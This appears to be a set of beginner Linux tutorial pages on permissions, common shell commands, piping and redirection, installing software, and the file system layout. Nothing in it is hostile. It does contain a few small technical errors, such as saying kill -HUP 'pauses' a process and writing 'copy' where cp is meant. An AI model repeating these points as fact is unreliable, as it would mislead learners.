The 3 characters on column 2 are the permissions for the owner (user rights) of the file or directory. The next 3 are permissions for the group that the file is owned by and the final 3 characters define the access permissions for the others group, that is, everyone else not part of the group.

So, there are 3 possible attributes that make up file access permissions:

  • r - Read permission. Whether the file may be read. In the case of a directory, this would mean the ability to list the contents of the directory.
  • w - Write permission. Whether the file may be written to or modified. For a directory, this defines whether you can make any changes to the contents of the directory. If write permission is not set then you will not be able to delete, rename or create a file.
  • x - Execute permission. Whether the file may be executed. In the case of a directory, this attribute decides whether you have permission to enter, run a search through that directory or execute some program from that directory.

Let's take a look at another example:

linux-introduction-file-permissions-5

Take the permissions of 'red-bulb', which are drwxr-x---. The owner of this directory is user david and the group owner of the directory is sys. The first 3 permission attributes are rwx. These permissions allow full read, write and execute access to the directory to user david. So we conclude that david has full access here.

The group permissions are r-x. Notice there is no write permission given here so while members of the group sys can look at the directory and list its contents, they cannot create new files or sub-directories. They also cannot delete any files or make changes to the directory content in any way.

Lastly, no one else has any access because the access attributes for others are - - -.

If we assume the permissions are drw-r--r-- you see that the owner of the directory (david) can list and make changes to its contents (Read and Write access) but, because there is no execute (x) permission, the user is unable to enter it! You must have read and execute (r-x) in order to enter a directory and list its contents. Members of the group sys have a similar problem, where they seem to be able to read (list) the directory's contents but can't enter it because there is no execute (x) permission given!

Lastly, everyone else can also read (list) the directory but is unable to enter it because of the absence of the execute (x) permission.

Here are some more examples focusing on the permissions:

-r--r--r-- :This means that owner, group and everyone else has only read permissions to the file (remember, if there's no 'd' or 'l', then we are talking about a file).

-rw-rw-rw- : This means that the owner, group and everyone else has read and write permissions.

-rwxrwxrwx : Here, the owner, group and everyone else has full permissions, so they can all read, write and execute the file (-).

Modifying Ownership & Permissions

So how do you change permissions or change the owner of a file?

Changing the owner or group owner of a file is very simple, you just type 'chown user:group filename.ext', where 'user' and 'group' are those to whom you want to give ownership of the file. The 'group' parameter is optional, so if you type 'chown david file.txt', you will give ownership of file.txt to the user named david.

In the case of a directory, nothing much changes as the same command is used. However, because directories usually contain files that also need to be assigned to the new user or group, we use the '-R' flag, which stands for 'recursive' - in other words all subdirectories and their files: 'chown -R user:group dirname'.

To change permissions you use the 'chmod' command. The possible options here are 'u' for the user, 'g' for the group, 'o' for other, and 'a' for all three. If you don't specify one of these letters it will change to all by default. After this you specify the permissions to add or remove using '+' or '-' . Let's take a look at an example to make it easier to understand:

If we wanted to add read, write and execute to the user of a particular file, we would type the following 'chmod u+rwx file.txt'. If on the other hand you typed 'chmod g-rw file.txt' you will take away read and write permissions of that file for the group .

While it's not terribly difficult to modify the permissions of a file or directory, remembering all the flags can be hard. Thankfully there's another way, which is less complicated and much faster. By replacing the permissions with numbers, we are able to calculate the required permissions and simply enter the correct sum of various numbers instead of the actual rights.

The way this works is simple. We are aware of three different permissions, Read (r), Write (w) and Execute (x). Each of these permissions is assigned a number as follows:

r (read) - 4

w (write) - 2

x (execute) - 1

Now, to correctly assign a permission, all you need to do is add up the level you want, so if you want someone to have read and write, you get 4+2=6, if you want someone to have just execute, it's just 1.. zero means no permissions. You work out the number for each of the three sections (owner, group and everyone else).

If you want to give read write and execute to the owner and nothing to everyone else, you'd get the number 7 0 0. Starting from the left, the first digit (7) presents the permissions for the owner of the file, the second digit (0) is the permissions for the group, and the last (0) is the permissions for everyone else. You get the 7 by adding read, write and execute permissions according to the numbers assigned to each right as shown in the previous paragraphs: 4+2+1 = 7.

r, w, x Permissions
Calculated Number

---

0
--x
1
-w-
2
-wx
3 (2+1)
r--
4
r-x
5 (4+1)
rw-
6 (4+2)
rwx
7 (4+2+1)


If you want to give full access to the owner, only read and execute to the group, and only execute to everyone else, you'd work it out like this :

owner: rwx = 4 + 2 + 1 = 7

group: r-x = 4 + 0 + 1 = 5

everyone: --x = 0 + 0 + 1 = 1

So your number will be 751, 7 for owner, 5 for group, and 1 for everyone. The command will be 'chmod 751 file.txt'. It's simple isn't it ?

If you want to give full control to everyone using all possible combinations, you'd give them all 'rwx' which equals to the number '7', so the final three digit number would be '777':

linux-introduction-file-permissions-6

If on the other hand you decide not to give anyone any permission, you would use '000' (now nobody can access the file, not even you!). However, you can always change the permissions to give yourself read access, by entering 'chmod 400 file.txt'.

For more details on the 'chmod' command, please take a look at the man pages.

As we will see soon, the correct combination of user and group permissions will allow us to perform our work while keeping our data safe from the rest of the world.

For example in order for a user or group to enter a directory, they must have at least read (r) and execute (x) permissions on the directory, otherwise access to it is denied:

linux-introduction-file-permissions-7

As seen here, user 'mailman' is trying to access the 'red-bulb' directory which belongs to user 'david' and group 'sys'. Mailman is not a member of the 'sys' group and therefore can't access it. At the same time the folder's permissions allow neither the group nor everyone to access it.

Now, what we did is alter the permission so 'everyone' has at least read and execute permissions so they are able to enter the folder - let's check it out:

linux-introduction-file-permissions-8

Here we see the 'mailman' user successfully entering the 'red-bulb' directory because everyone has read (r) and execute (x) access to it!

The world of Linux permissions is pretty user friendly as long as you see from the right perspective :) Practice and reviewing the theory will certainly help you remember the most important information so you can perform your work without much trouble.

If you happen to forget something, you can always re-visit us - any time of the day!

Continuing on to our last page, we will provide you with a few links to some of the world's greatest Linux resources, covering Windows to Linux migration, various troubleshooting techniques, forums and much more that will surely be of help.

This completes our initial discussion on the Linux operating system. Visit our Finding More Information page to discover useful resources that will assist you in your Linux journey or visit our Linux section to access more technical articles on the Linux operating system.

  • Hits: 330990

Advanced Linux Commands

Now that you're done learning some of the Basic Linux commands and how to use them to install Linux Software, it's time we showed you some of the other ways to work with Linux. Bear in mind that each distribution of Linux (Redhat, SUSE, Mandrake etc) will come with a slightly different GUI (Graphical User Interface) and some of them have done a really good job of creating GUI configuration tools so that you never need to type commands at the command line.

Vi Editor

For example, if you want to edit a text file you can easily use one of the powerful GUI tools like Kate, Kwrite etc., which are all like notepad in Windows though much more powerful; they have features such as multiple file editing and syntax highlighting (if you open an HTML file it understands the HTML tags and highlights them for you). However, you can also use the very powerful vi editor.

When first confronted by vi most users are totally lost, you open a file in vi (e.g vi document1) and try to type, but nothing seems to happen.. the system just keeps beeping!

Well that's because vi functions in two modes, one is the command mode, where you can give vi commands such as open a file, exit, split the view, search and replace etc., and the other mode is the insert view where you actually type text!

Don't be put off by the fact that vi doesn't have a pretty GUI interface to go with it, this is an incredibly powerful text editor that would be well worth your time learning... once you're done with it you'll never want to use anything else!


Realising that most people would find vi hard to use straight off, there is a useful little walk-through tutorial that you can access by typing vimtutor at a command line. The tutorial opens vi with the tutorial in it, and you try out each of the commands and shortcuts in vi itself. It's very easy and makes navigating around vi a snap. Check it out.

•Grep

Another very useful Linux command is the grep command. This little baby searches for a string in any file. The grep command is frequently used in combination with other commands in order to search for a specific string. For example, if we wanted to check our web server's log file for a specific URL query or IP address, the 'grep' command would do this job just fine.

If, on the other hand, you want to find every occurence of 'hello world' in every .txt file you have, you would type grep "hello world" *.txt

You'll see some very common command structures later on that utilise 'grep'. At the same time, you can go ahead and check grep's man page by typing man grep , it has a whole lot of very powerful options.

linux-introduction-avd-cmd-line-3

PS - Process ID (PID) display

The ps command will show all the tasks you are currently running on the system, it's the equivalent of Windows Task Manager and you'll be happy to know that there are also GUI versions of 'ps'.

If you're logged in as root in your Linux system and type ps -aux , you'll see all processes running on the system by every user, however, for security purposes, users will only be able to see processes owned by them when typing the same command.

linux-introduction-avd-cmd-line-4

Again, man ps will provide you with a bundle of options available by the command.

•Kill

The 'kill' command is complementary to the 'ps' command as it will allow you to terminate a process revealed with the previous command. In cases where a process is not responding, you would use the following syntax to effectively kill it: kill -9 pid where 'pid' is the Process ID (PID) that 'ps' displays for each task.

linux-introduction-avd-cmd-line-5

In the above example, we ran a utility called 'bandwidth' twice which is shown as two different process IDs (7171 & 13344) using the ps command. We then attempted to kill one of them using the command kill -9 7171 . The next time we ran the 'ps', the system reported that a process that was started with the './bandwidth' command had been previously killed.

Another useful flag we can use with the 'kill' command is the -HUP. This neat flag won't kill the process but pause it and at the same time force it to reload its configuration. So, if you've got a service running and need to restart it because of changes made in its configuration file, then the -HUP flag will do just fine. Many people look at it as an alternative 'reload' command.

The complete syntax to make use of the flag is: kill -HUP pid where 'pid' is the process ID number you can obtain using the 'ps' command, just as we saw in the previous examples.

Chaining Commands, Redirecting Output, Piping

In Linux, you can chain groups of commands together with incredible ease, this is where the true power of the Linux command line exists, you use small tools, each of which does one little task and passes the output on to the next one.

For example, when you run the ps aux command, you might see a whole lot of output that you cannot read in one screen, so you can use the pipe symbol ( | ) to send the output of 'ps' to 'grep' which will search for a string in that output. This is known as 'piping' as it's similar to plumbing where you use a pipe to connect two things together.

linux-introduction-avd-cmd-line-6

Say you want to find the task 'antispam' : you can run ps aux | grep antispam . Ps 'pipes' its output to grep and it then searches for the string, showing you only the line with that text.

If you wanted ps to display one page at a time you can pipe the output of ps to either more or less . The advantage of less is that it allows you to scroll upwards as well. Try this: ps aux | less . Now you can use the cursors to scroll through the output, or use pageup, pagedown.

•Alias

The 'alias' command is very neat, it lets you make a shortcut keyword for another longer command. Say you don't always want to type ps aux | less, you can create an alias for it.. we'll call our alias command 'pl'. So you type  alias pl='ps aux | less' .

Now whenever you type pl , it will actually run ps aux | less - Neat, is'nt it?

linux-introduction-avd-cmd-line-7

 

You can view the aliases that are currently set by typing alias:

linux-introduction-avd-cmd-line-8

As you can see, there are quite a few aliases already listed for the 'root' account we are using. You'll be suprised to know that most Linux distributions automatically create a number of aliases by default - these are there to make your life as easy as possible and can be deleted anytime you wish.

Output Redirection

It's not uncommon to want to redirect the output of a command to a text file for further processing. In the good old DOS operating system, this was achieved by using the '>' operator. Even today, with the latest Windows operating systems, you would open a DOS command prompt and use the same method!

The good news is that Linux also supports these functions without much difference in the command line.

For example, if we wanted to store the listing of a directory into a file, we would type the following: ls > dirlist.txt:

linux-introduction-avd-cmd-line-9

As you can see, we've taken the output of 'ls' and redirected it to our file. Let's now take a look and see what has actually been stored in there by using the command cat dirlist.txt :

linux-introduction-avd-cmd-line-10

As expected, the dirlist.txt file contains the output of our previous command. So you might ask yourself 'what if I need to append the results?' - No problem here, as we've already got you covered.

When there's a need for appending files or results, as in DOS we simply use the double >> operator. By using the command it will append the new output to the file we have specified in the command line:

linux-introduction-avd-cmd-line-11

The above example clearly shows the content of our file named 'document2' which is then appended to the previously created file 'dirlist.txt'. With the use of the 'cat' command, we are able to examine its contents and make sure the new data has been appended.

Note:

By default, the single > will overwrite the file if it exists, so if you give the ls > dirlist.txt command again, it will overwrite the first dirlist.txt. However, if you specify >> it will add the new output below the previous output in the file. This is known as output redirection.

In Windows and DOS you can only run one command at a time, however, in Linux you can run many commands simultaneously. For example, let's say we want to see the directory list, then delete all files ending with .txt, then see the directory list again.

This is possible in Linux using one statement as follows : ls -l; rm -f *.txt; ls -l . Basically you separate each command using a semicolon, ';'. Linux then runs all three commands one after the other. This is also known as command chaining.

Background Processes

If you affix an ampersand '&' to the end of any command, it will run in the background and not disturb you, there is no equivalent for this in Windows and it is very useful because it lets you start a command in the background and run other tasks while waiting for that to complete.

The only thing you have to keep in mind is that you will not see the output from the command on your screen since it is in the background, but we can redirect the output to a file the way we did two paragraphs above.

For example, if you want to search through all the files in a directory for the word 'Bombadil', but you want this task to run in the background and not interrupt you, you can type this: grep "Bombadil" *.* >> results.txt& . Notice that we've added the ampersand '&' character to the end of the command, so it will now run in the background and place the results in the file results.txt . When you press enter, you'll see something like this :

$ grep "Bombadil" *.* >> results.txt&

[1] 1272

linux-introduction-avd-cmd-line-12

Our screen shot confirms this. We created a few new files that contained the string 'Bombadil' and then gave the command grep "Bombadil" *.* >> results.txt& . The system accepted our command and placed the process in the background using PID (Process ID) 14976. When we next gave the 'ls' command to see the listing of our directory we saw our new file 'results.txt' which, as expected, contained the files and lines where our string was found.

If you run a 'ps' while this is executing a very complex command that takes some time to complete, you'll see the command in the list. Remember that you can use all the modifiers in this section with any combination of Linux commands, that's what makes it so powerful. You can take lots of simple commands and chain, pipe, redirect them in such a way that they do something complicated!

Our next article covers Linux File & Folder Permissions, alternatively you can visit our Linux section for more linux related technical articles.

 



  • Hits: 51788

Installing Software On Linux

Installing software in Linux is very different from Windows for one very simple reason: most Linux programs come in 'source code' form. This allows you to modify any program (if you're a programmer) to suit your purposes! While this is incredibly powerful for a programmer, for most of us who are not- we just want to start using the program!

Most programs will come 'zipped' just like they do in Windows, in other words they pack all the files together into one file and compress it to a more manageable size. Depending on the zipping program used, the method of unzipping may vary, however, each program will have step by step instructions on how to unpack it.

Most of the time the 'tar' program will be used to unpack a package and unzipping the program is fairly straightforward. This is initiated by typing 'tar -zxvf file-to-unzip.tgz' where 'file-to-unzip.tgz' is the actual filename you wish to unzip. We will explain the four popular options we've used (zxvf) but you can read the 'tar man' page if you are stuck or need more information.

As mentioned, the 'tar' program is used to unpack a package we've downloaded and would like to install. Because most packages use 'tar' to create one file for easy downloads, gzip (Linux's equivalent to the Winzip program) is used to compress the tar file (.gz), reducing the size and making it easier to transfer. This also explains the reason most files have extensions such as '.tgz' or '.tar.gz'.

To make life easy, instead of giving two commands to decompress (unzip) and unpack the package, we provide tar with the -z option to automatically unzip to package and then proceed with unpacking it (-x). Here are the options in greater detail:

-z : Unzip tar package before unpacking it.

-x : Extract/Unpack the package

-v : Verbosely list files processed

-f : use archive file (filename provided)

linux-introduction-installing-software-1

Because the list of files was long, we've cut the bottom part to make it fit in our small window.

Once you have unzipped the program, go into its directory and look for a file called INSTALL, most programs will come with this file. It contains detailed instructions on how to install it, including the necessary commands to be typed, depending on the Linux distribution you have. After you've got that out of the way, you're ready to use the three magic commands that install 99% of all software in Linux :)

Open the program directory and type ./configure. [1st magic command]

linux-introduction-installing-software-2

You'll see a whole lot of output that you may not understand; this is when the software you're installing is automatically checking your system to analyze the options that will work best. Unlike the Windows world, where programs are made to work on a very general computer, Linux programs automatically customize themselves to fit your system.

Think of it as the difference between buying ready-made clothes and having tailor made clothes especially designed for you. This is one of the most important reasons why programs are in the 'source code' form in Linux.

In some cases, the ./configure command will not succeed and will produce errors that will not allow you to take the step and compile your program. In these cases, you must read the errors, fix any missing library files (most common causes) or problems and try again:

linux-introduction-installing-software-3

As you can see, we've run into a few problems while trying to configure this program on our lab machine, so we looked for a different program that would work for the purpose of this demonstration!

linux-introduction-installing-software-4

 

This ./configure finished without any errors, so the next step is to type make. [2nd magic command]

linux-introduction-installing-software-5

This simple command will magically convert the source code into a useable program... the best analogy of this process is that in the source code are all the ingredients in a recipe, if you understand programming, you can change the ingredients to make the dish better. Typing the make command takes the ingredients and cooks the whole meal for you! This process is known as 'compiling' the program

If make finishes successfully, you will want to put all the files into the right directories, for example, all the help files in the help files directory, all the configuration files in the /etc directory (covered in the pages that follow).

To perform this step, you have to log in as the superuser or 'root' account, if you don't know this password you can't do this.

Assuming you are logged in as root, type make install. [3rd magic command]

linux-introduction-installing-software-6

Lastly, once our program has been configured, compiled and installed in /usr/local/bin with the name of 'bwn-ng', we are left with a whole bunch of extra files that are no longer useful, these can be cleaned using the make clean command - but this, as you might have guessed, is not considered a magic command :)

linux-introduction-installing-software-7

 There, that's it!

Now here's the good news... that was the old hard way!

All the people involved with Linux realised that most people don't need to read the source code and change the program and don't want to compile programs, so they have a new way of distributing programs in what is known as 'rpm' (red hat package manager) format.

This is one single file of a pre-compiled program, you just have to double click the rpm file (in the Linux graphical interface - X) and it will install it on your system for you!

In the event that you find a program that is not compiling with 'make' you can search on the net (we recommend www.pbone.net ) for an rpm based on your Linux distribution and version. Installation then is simply one click away for the graphical X desktop, or one command away for the hardcore Linux enthusiasts!

Because the 'rpm' utility is quite complex with a lot of flags and options, we would highly recommend you read its 'man' page before attempting to use it to install a program.

One last note about rpm is that it will also check to see if there are any dependent programs or files that should or shouldn't be touched during an install or uninstall. By doing so, it is effectively protecting your operating system from accidentally overwriting or deleting a critical system file, causing a lot of problems later on!

For those looking for a challenge, our next article covers Advanced Linux Commands and explores commands most used with the administration of the Linux operating system. Alternatively you can visit our Linux section to get access to a variaty of Linux articles.

  • Hits: 25855

The Linux Command Line

You could actually skip this whole section for those who are already familiar with the topic, but we highly recommend you read it because this is the heart of Linux. We also advise you to go through this section while sitting in front of the computer.

Most readers will be familiar with DOS in Windows and opening a DOS box. Well, let's put it this way.. comparing the power of the Linux command line with the power of the DOS prompt is like comparing a Ferrari with a bicycle!

People may tell you that the Linux command line is difficult and full of commands to remember, but it's the same thing in DOS and just remember - you can get by in Linux without ever opening a command line (just like you can do all your work in Windows without ever opening a DOS box !). However, the Linux command line is actually very easy, logical and once you have even the slightest ability and fluency with it, you'll be amazed as to how much faster you can do complicated tasks than you would be able to with the fancy point-and-click graphics and mouse interface.

To give you an example, imagine the number of steps it would take you in Windows to find a file that has the word "hello" at the end of a line, open that file, remove the first ten lines, sort all the other lines alphabetically and then print it. In Linux, you could achieve this with a single command! - Have we got your attention yet ?!

Though you might wonder what you could achieve by doing this - the point is that you can do incredibly complicated things by putting together small commands, exactly like using small building blocks to make a big structure.

We'll show you a few basic commands to move around the command line as well as their equivalents in Windows. We will first show you the commands in their basic form and then show you how you can see all the options to make them work in different ways.

The Basic Commands

As a rule, note that anything typed in 'single quotes and italics' is a valid Linux command to be typed at the command line, followed by Enter.

We will use this rule throughout all our tutorials to avoid confusion and mistakes. Do not type the quotes and remember that, unlike Windows, Linux is case sensitive, thus typing ‘Document' is different from typing 'document'.

•  ls - You must have used the 'dir' command on Windows... well this is like 'dir' command on steroids! If you type 'ls' and press enter you will see the files in that directory, there are many useful options to change the output. For example, 'ls -l' will display the files along with details such as permissions (who can access a file), the owner of the file(s), date & time of creation, etc. The 'ls' command is probably the one command you will use more than any other on Linux. In fact, on most Linux systems you can just type 'dir' and get away with it, but you will miss out on the powerful options of the 'ls' command.

linux-introduction-cmd-line-1

 

•  cd - This is the same as the DOS command: it changes the directory you are working in. Suppose you are in the '/var/cache' directory and want to go to its subfolder 'samba' , you can type 'cd samba' just as you would if it were a DOS system.

linux-introduction-cmd-line-2

Imagine you were at the '/var/cache' directory and you wanted to change to the '/etc/init.d' directory in one step, you could just type 'cd /etc/init.d' as shown above. On the other hand, if you just type 'cd' and press enter, it will automatically take you back to your personal home directory (this is very useful as all your files are usually stored there).

We also should point out that while Windows and DOS use the well known back-slash ' \ ' in the full path address, Linux differentiates by using the forward-slash ' / '. This explains why we use the command 'cd /etc/init.d' and not 'cd \etc\init.d' as most Windows users would expect.

•  pwd - This will show you the directory you are currently in, should you forget. It's almost like asking the operating system 'Where am I right now ?'. It will show you the 'present working directory'.

linux-introduction-cmd-line-3

 

•  cp - This is the equivalent of the Windows 'copy' command. You use it to copy a file from one place to another. So if you want to copy a file called 'document' to another file called 'document1' , you would need to type 'cp document document1'. In other words, first the source, then the destination.

linux-introduction-cmd-line-4

The 'cp' command will also allow you to provide the path to copy it to. For example, if you wanted to copy 'document' to the home directory of user1, you would then type 'cp document /home/user1/'. If you want to copy something to your home directory, you don't need to type the full path (example /home/yourusername), you can use the shortcut '~' (tilda), so to copy 'document' to your home directory, you can simply type 'copy document ~' .

 

•  rm - This is the same as the 'del' or 'delete' command in Windows. It will delete the files you input. So if you need to delete a file named 'document', you type 'rm document'. The system will ask if you are sure, so you get a second chance! If you typed 'rm –f' then you will force (-f) the system to execute the command without requiring confirmation, this is useful when you have to delete a large number of files.

linux-introduction-cmd-line-5

In all Linux commands you can use the '*' wildcard that you use in Windows, so to delete all files ending with .txt in Windows you would type 'del *.txt' whereas in Linux you would type 'rm -f *.txt'. Remember, we used the '-f' flag because we don't want to be asked to confirm the deletion of each file.

linux-introduction-cmd-line-6

To delete a folder, you have to give rm the '-r' (recursive) option; as you might have already guessed, you can combine options like this: 'rm -rf mydirectory'. This will delete the directory 'mydirectory' (and any subdirectories within it) and will not ask you twice. Combining options like this works for all Linux commands.

 

•mkdir / rmdir - These two commands are the equivalent of Windows' 'md' and 'rd', which allow you to create (md) or remove (rd) a directory. So if you type 'mkdir firewall', a directory will be created named 'firewall'. On the other hand, type 'rmdir firewall' and the newly created directory will be deleted. We should also note that the 'rmdir' command will only remove an empty directory, so you might be better off using 'rm -rf' as described above.

linux-introduction-cmd-line-7

 

•mv - This is the same as the 'move' command on Windows. It works like the 'cp' or copy command, except that after the file is copied, the original source file is deleted. By the way, there is no rename command on Linux because technically moving and renaming a file is the same thing!

In this example, we recreated the 'firewall' directory we deleted previously and then tried renaming it to 'firewall-cx'. Lastly, the new directory was moved to the '/var' directory:

linux-introduction-cmd-line-8

That should be enough to let you move around the command line or the 'shell', as it's known in the Linux community. You'll be pleased to know that there are many ways to open a shell window from the ‘X' graphical desktop, which can be called an xterm, or a terminal window.

•  cat / more / less - These commands are used to view files containing text or code. Each command will allow you to perform a special function that is not available with the others so, depending on your work, some might be used more frequently than others.

The 'cat' command will show you the contents of any file you select. This command is usually used in conjunction with other advanced commands such as 'grep' to look for a specific string inside a large file which we'll be looking at later on.

When issued, the 'cat' command will run through the file without pausing until it reaches the end, just like a file scanner that examines the contents of a file while at the same time showing the output on your screen:

linux-introduction-cmd-line-9

In this example, we have a whopper 215kb text file containing the system's messages. We issued the 'cat messages' command and the file's content is immediately listed on our screen, only this went on for a minute until the 'cat' command reached the end of the file and then exited.

Not much use for this example, but keep in mind that we usually pipe the output to other commands in order to give us some usable results :)

'more' is used in a similar way, but will pause the screen when it has filled with text, in which case we need to hit the space bar or enter key to continue scrolling per page or line. The 'up' or 'down' arrow keys are of no use for this command and will not allow you to scroll through the file - it's pretty much a one way scrolling direction (from the beginning to the end) with the choice of scrolling per page (space bar) or line (enter key).

The 'less' command is an enhanced version of 'more', and certainly more useful. With the less command, you are able to scroll up or down a file's content. To scroll down per page, you can make use of the space bar, or CTRL-D. To scroll upwards towards the beginning of the file, use CTRL-U.

It is not possible for us to cover all the commands and their options because there are thousands! However, we will teach you the secret to using Linux -- that is, how to find the right tool (command) for a job, and how to find help on how to use it.

Can I Have Some Help Please?

To find help on a command, you type the command name followed by '--help'. For example, to get help on the 'mkdir' command, you will type 'mkdir --help'. But there is a much more powerful way...

For those who read our previous section, remember we told you that Linux stores all files according to their function? Well Linux stores the manuals (help files) for every program installed, and the best part is that you can look up the 'man pages' (manuals) very easily. All the manuals are in the same format and show you every possible option for a command.

To open the manual of a particular command, type 'man' followed by the command name, so to open the manual for 'mkdir' type 'man mkdir':

linux-introduction-cmd-line-10

Interestingly, try getting help on the 'man' command itself by typing 'man man'. This is the most authoritative and comprehensive source of help for anything you have in Linux, and the best part is that every program will come with its manual! Isn't this so much better than trying to find a help file or readme.txt file :) ?

Here's another incredibly useful command -- if you know the task you want to perform, but don't know the command or program to use, use the 'apropos' command. This command will list all the programs on the system that are related to the task you want to perform. For example, say you want to send email but don't know the email program, you can type 'apropos email' and receive a list of all the commands and programs on the system that will handle email! There is no equivalent of this on Windows.

Searching for Files in Linux?

Another basic function of any operating system is knowing how to find or search for a missing or forgotten file, and if you have already asked yourself this question, you'll be pleased to find out the answer :)

The simplest way to find any file in Linux is to type 'locate' followed by the filename. So if you want to find a file called 'document' , you type 'locate document'. The locate command works using a database that is usually built when you are not using your Linux system, indexing all your files and directories to help you locate them.

You can use the more powerful 'find' command, but I would suggest you look at its 'man' page first by typing 'man find'. The 'find' command differs from the 'locate' command in that it does not use a database, but actually looks for the file(s) requested by scanning the whole directory or file system depending on where you execute the command.

Logically, the 'locate' command is much faster when looking for a file that has already been indexed in its database, but will fail to discover any new files that have just been installed since they haven't been indexed! This is where the 'find' command comes to the rescue!

Our next article covers  Installing Software on Linux, alternatively you can head back to our Linux Section.

 

  • Hits: 36088

The Linux File System

A file system is nothing more than the way the computer stores and retrieves all your files. These files include your documents, programs, help files, games, music etc. In the Windows world we have the concept of files and folders.

A folder (also known as a directory) is nothing more than a container for different files so that you can organise them better. In Linux, the same concept holds true -- you have files, and you have folders in which you organise these files.

The difference is that Windows stores files in folders according to the program they belong to (in most cases), in other words, if you install a program in Windows, all associated files -- such as the .exe file that you run, the help files, configuration files, data files etc. go into the same folder. So if you install for example Winzip, all the files relating to it will go into one folder, usually c:\Program Files\Winzip.

In Linux however, files are stored based on the function they perform. In other words, all help files for all programs will go into one folder made just for help files, all the executable (.exe) files will go into one folder for executable programs, all programs configuration files will go into a folder meant for configuration files.

This layout has a few significant advantages as you always know where to look for a particular file. For example, if you want to find the configuration file for a program, you'll bound to find it in the actual program's installation directory.

With the Windows operating system, it's highly likely the configuration file will be placed in the installation directory or some other Windows system subfolder. In addition, registry entries is something you won't be able to keep track of without the aid of a registry tracking program - something that does not exist in the Linux world since there is no registry!

Of course in Linux everything is configurable to the smallest level, so if you choose to install a program and store all its files in one folder, you can, but you will just complicate your own life and miss out on the benefits of a file system that groups files by the function they perform rather than arbitrarily.

Linux uses an hierarchical file system, in other words there is no concept of 'drives' like c: or d:, everything starts from what is called the ‘/' directory (known as the root directory). This is the top most level of the file system and all folders are placed at some level from here. This is how it looks:

linux-introduction-file-system-1

 As a result of files being stored according to their function on any Linux system, you will see many of the same folders.

These are 'standard' folders that have been pre-designated for a particular purpose. For example the 'bin' directory will store all executable programs (the equivalent of Windows ‘.exe ' files).

Remember also that in Windows you access directories using a backslash (eg c:\Program Files) whereas in Linux you use a forward slash (eg: /bin ).

In other words you are telling the system where the directory is in relation to the root or top level folder.

So to access the cdrom directory according to the diagram on the left you would use the path /mnt/cdrom.

To access the home directory of user 'sahir' you would use /home/sahir.

 

 

 

 

So it's now time to read a bit about each directory function to help us get a better understanding of the operating system:

• bin - This directory is used to store the system's executable files. Most users are able to access this directory as it does not usually contain system critical files.

• etc - This folder stores the configuration files for the majority of services and programs run on the machine. These configuration files are all plain text files that you can open and edit the configuration of a program instantly. Network services such as samba (Windows networking), dhcp, http (apache web server) and many more, rely on this directory! You should be careful with any changes you make here.

• home - This is the directory in which every user on the system has his own personal folder for his own personal files. Think of it as similar to the 'My Documents' folder in Windows. We've created one user on our test system by the name of 'sahir' - When Sahir logs into the system, he'll have full access to his home directory.

• var - This directory is for any file whose contents change regularly, such as system log files - these are stored in /var/log. Temporary files that are created are stored in the directory /var/tmp.

• usr - This is used to store any files that are common to all users on the system. For example, if you have a collection of programs you want all users to access, you can put them in the directory /usr/bin. If you have a lot of wallpapers you want to share, they can go in /usr/wallpaper. You can create directories as you like.

• root - This can be confusing as we have a top level directory ‘/' which is also called ‘the root folder'.

The 'root' (/root) directory is like the 'My Documents' folder for a very special user on the system - the system's Administrator, equivalent to Windows 'Administrator' user account.

This account has access to any file on the system and can change any setting freely. Thus it is a very powerful account and should be used carefully. As a good practice, even if you are the system Administrator, you should not log in using the root account unless you have to make some configuration changes.

It is a better idea to create a 'normal' user account for your day-to-day tasks since the 'root' account is the account for which hackers always try to get the password on Linux systems because it gives them unlimited powers on the system. You can tell if you are logged in as the root account because your command prompt will have a hash '#' symbol in front, while other users normally have a dollar '$' symbol.

• mnt - We already told you that there are no concepts of 'drives' in Linux. So where do your other hard-disks (if you have any) as well as floppy and cdrom drives show up?

Well, they have to be 'mounted' or loaded for the system to see them. This directory is a good place to store all the 'mounted' devices. Taking a quick look at our diagram above, you can see we have mounted a cdrom device so it is showing in the /mnt directory. You can access the files on the cdrom by just going to this directory!

• dev - Every system has its devices, and the Linux O/S is no exeption to this! All your systems devices such as com ports, parallel ports and other devices all exist in /dev directory as files and directories! You'll hardly be required to deal with this directory, however you should be aware of what it contains.

• proc - Think of the /proc directory as a deluxe version of the Windows Task Manager. The /proc directoy holds all the information about your system's processes and resources. Here again, everything exists as a file and directory, something that should't surprise you by now!

By examining the appropriate files, you can see how much memory is being used, how many tcp/ip sessions are active on your system, get information about your CPU usage and much more. All programs displaying information about your system use this directory as their source of information!

• sbin - The /sbin directory's role is that similar to the /bin directory we covered earlier, but with the difference its only accessible by the 'root' user. Reason for this restriction as you might have already guessed are the sensitive applications it holds, which generally are used for the system's configuration and various other important services. Consider it an equivelant to the Windows Administration tools folder and you'll get the idea.

Lastly, if you've used a Linux system, you'll have noticed that not many files have an extension - that is, the three letters after the dot, as found in Windows and DOS: file1.txt , winword.exe , letter.doc.

While you can name your files with extensions, Linux doesn't really care about the 'type' of file. There are very quick ways to instantly check the type of file anything is. You can even make just about any file in Linux an executable or .exe file at whim!

Linux is smart enough to recognise the purpose of a file so you don't need to remember the meaning of different extensions.

You have now covered the biggest hurdle faced by new Linux users. Once you get used to the file system you'll find it is a very well organised system that makes storing files a very logical process. There is a system and, as long as you follow it, you'll find most of your tasks are much simpler than other operating system tasks. Our next article, The Linux Command Line explores the Linux command, commands, options and much more. Alternativerly you can head back to our Linux section to find more technical articles covering the Linux operating system.

  • Hits: 38764

Why Use Linux?

The first question is - what are the benefits of using Linux instead of Windows? This is in fact a constant debate between the Windows and Linux communities and while we won't be taking either side, you'll discover that our points will favour the Linux operating system because they are valid :)

Of course, if you don't agree, our forums have a dedicated Linux section where we would happily discuss it with you!

Reasons for using Linux ....

While we could list a billion technical reasons, we will focus on those that we believe will affect you most:

•Linux is free. That's right - if you never knew it, the Linux operating system is free of charge. No user or server licenses are required*! If, however, you walk into an IT shop or bookstore, you will find various Linux distributions on the shelf available for purchase, that cost is purely to cover the packaging and possible support available for the distribution.

* We must note that the newer 'Advanced Linux Servers', now available from companies such as Redhat, actually charge a license fee because of the support and update services they provide for the operating system. In our opinion, these services are rightly charged since they are aimed at businesses that will use their operating system in critical environments where downtime and immediate support is non-negotiable.

•Linux is developed by hundreds of thousands of people worldwide. Because of this community development mode there are very fresh ideas going into the operating system and many more people to find glitches and bugs in the software than any commercial company could ever afford (yes, Microsoft included).

•Linux is rock solid and stable, unlike Windows, where just after you've typed a huge document it suddenly crashes, making you loose all your work!

